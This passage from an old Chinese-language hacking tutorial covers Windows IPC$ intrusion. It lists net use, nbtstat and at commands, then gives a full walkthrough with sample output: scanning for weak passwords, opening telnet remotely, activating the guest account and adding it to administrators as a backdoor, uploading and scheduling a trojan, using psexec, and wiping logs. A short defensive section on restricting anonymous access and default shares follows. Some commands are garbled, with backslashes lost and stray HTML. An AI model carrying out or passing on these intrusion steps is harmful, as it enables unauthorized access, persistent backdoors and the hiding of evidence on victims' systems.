十 一些需要shell才能完成的命令
看到很多教程這方面寫的十分不準確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執行了,起了誤導作用。那么下面我總結一下需要在shell才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
2 打開遠程主機的ipc$共享,默認共享,普通共享的操作需要在shell下完成;
3 運行/關閉遠程主機的服務,需要在shell下完成;
4 啟動/殺掉遠程主機的進程,也需要在shell下完成。
十一 入侵中可能會用到的相關命令
請注意命令適用于本地還是遠程,如果適用于本地,你只能在獲得遠程主機的shell后,才能向遠程主機執行。
1 建立空連接:
net use \IPipc$ "" /user:""
2 建立非空連接:
net use \IPipc$ "psw" /user:"aclearcase/" target="_blank" >ccount"
3 查看遠程主機的共享資源(但看不到默認共享)
net view \IP
4 查看本地主機的共享資源(可以看到本地的默認共享)
net share
5 得到遠程主機的用戶名列表
nbtstat -A IP
6 得到本地主機的用戶列表
net user
7 查看遠程主機的當前時間
net time \IP
8 顯示本地主機當前服務
net start
9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y
10 映射遠程共享:
net use z: \IPaby
此命令將共享名為baby的共享資源映射到z盤
11 刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del /y刪除全部
12 向遠程主機復制文件
copy 路徑srv.exe \IP共享目錄名,如:
copy ccbirds.exe \*.*.*.*c 即將當前目錄下的文件復制到對方c盤內
13 遠程添加計劃任務
at \ip 時間 程序名,如:
at \127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
14 開啟遠程主機的telnet
這里要用到一個小程序:opentelnet.exe,各大下載站點都有,而且還需要滿足四個要求:
1)目標開啟了ipc$共享
2)你要擁有管理員密碼和帳號
3)目標開啟RemoteRegistry服務,用戶就該ntlm認證
4)對WIN2K/XP有效,NT未經測試
命令格式:OpenTelnet.exe \server account psw NTLM認證方式 port
試例如下:c:>OpenTelnet.exe \*.*.*.* administrator "" 1 90
15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 關閉遠程主機的telnet
同樣需要一個小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \server account psw
試例如下:c:>ResumeTelnet.exe \*.*.*.* administrator ""
17 刪除一個已建立的ipc$連接
net use \IPipc$ /del
十二 ipc$完整入侵步驟祥解
其實入侵步驟隨個人愛好有所不同,我就說一下常見的吧,呵呵,獻丑了!
1 用掃描軟件搜尋存在若口令的主機,比如流光,SSS,X-scan等,隨你的便,然后鎖定目標,如果掃到了管理員權限的口令,你可以進行下面的步驟了,假設你現在得到了administrator的密碼為空
2 此時您有兩條路可以選擇:要么給對方開telnet(命令行),要么給它傳木馬(圖形界面),那我們就先走telnet這條路吧
3上面開telnet的命令沒忘吧,要用到opentelnet這個小程序
c:>OpenTelnet.exe \192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \server username password NTLMAuthor telnetport
*******************************************************
Connecting \192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*說明你已經打開了一個端口90的telnet。
4 現在我們telnet上去
telnet 192.168.21.* 90
如果成功,你將獲得遠程主機的一個shell,此時你可以像控制自己的機器一樣控制你的肉雞了,那么做點什么呢?把guest激活再加入管理組吧,就算留個后門了
5 C:>net user guest /active:yes
*將Guest用戶激活,也有可能人家的guest本來就試活的,你可以用net user guest看一下它的帳戶啟用的值是yes還是no
6 C:>net user guest 1234
*將Guest的密碼改為1234,或者改成你喜歡的密碼
7 C:>net localgroup administrators guest /add
*將Guest變為Administrator,這樣,即使以后管理員更改了他的密碼,我們也可以用guest登錄了,不過也要提醒您,因為通過安全策略的設置,可以禁止guest等帳戶的遠程訪問,呵呵,如果真是這樣,那我們的后門也就白做了,愿上帝保佑Guest。
8 好了,現在我們來走另一條路,給它傳個木馬玩玩
9 首先,我們先建立起ipc$連接
C:>net use \192.168.21.*ipc$ "" /user:administrator
10 既然要上傳東西,就要先知道它開了什么共享
C:>net view \192.168.21.*
在 \192.168.21.*的共享資源
資源共享名 類型 用途 注釋
C Disk
D Disk
命令成功完成。
*好了,我們看到對方共享了C,D兩個盤,我們下面就可以向任意一個盤復制文件了。再次聲明,因為用net view命令無法看到默認共享,因此通過上面返回的結果,我們并不能判斷對方是否開啟了默認共享。
11 C:>copy love.exe \192.168.21.*c
已復制 1 個文件
*用這個命令你可以將木馬客戶端love.exe傳到對方的c盤下,當然,如果能復制到系統文件夾下是最好的了,不容易被發現
12 運行木馬前,我們先看看它現在的時間
net time \192.168.21.*
\192.168.21.*的當前時間是 2003/8/22 上午 11:00
命令成功完成
13 現在我們用at運行它吧,不過對方一定要開了Task Scheduler服務(允許程序在指定時間運行),否則就不行了
C:>at \192.168.21.* 11:02 c:love.exe
新加了一項作業,其作業 ID = 1
14 剩下就是等了,等過了11:02,你就可以用控制端去連接了,如果成功你將可以用圖形界面去控制遠程主機了,如果連接失敗,那么它可能在局域網里,也可能程序被防火墻殺了,還可能它下線了(沒這么巧吧),無論哪種情況你只好放棄了
嗯,好了,兩種基本方法都講了。如果你對上面的操作已經輕車熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec執行木馬,用命令:psexec \tergetIP -u user -p paswd cmd.exe直接獲得shell等,這些都是可以得,隨你的便。不過最后不要忘了把日志清理干凈,可以用榕哥的elsave.exe。
講了ipc$的入侵,就不能不說如何防范,那么具體要怎樣做呢?看下面
十三 如何防范ipc$入侵
1 禁止空連接進行枚舉(此操作并不能阻止空連接的建立)
方法1:
運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous = DWORD的鍵值改為:1
如果設置為"1",一個匿名用戶仍然可以連接到IPC$共享,但限制通過這種連接得到列舉SAM帳號和共享等信息;在Windows 2000 中增加了"2",限制所有匿名訪問除非特別授權,如果設置為2的話,可能會有一些其他問題發生,建議設置為1。如果上面所說的主鍵不存在,就新建一個再改鍵值。
方法2:
在本地安全設置-本地策略-安全選項-在'對匿名連接的額外限制'中做相應設置
2 禁止默認共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(重起后默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續刪除)
3)停止server服務
net stop server /y (重新啟動后server服務會重新開啟)
4)禁止自動打開默認共享(此操作并未關閉ipc$共享)
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的鍵值改為:00000000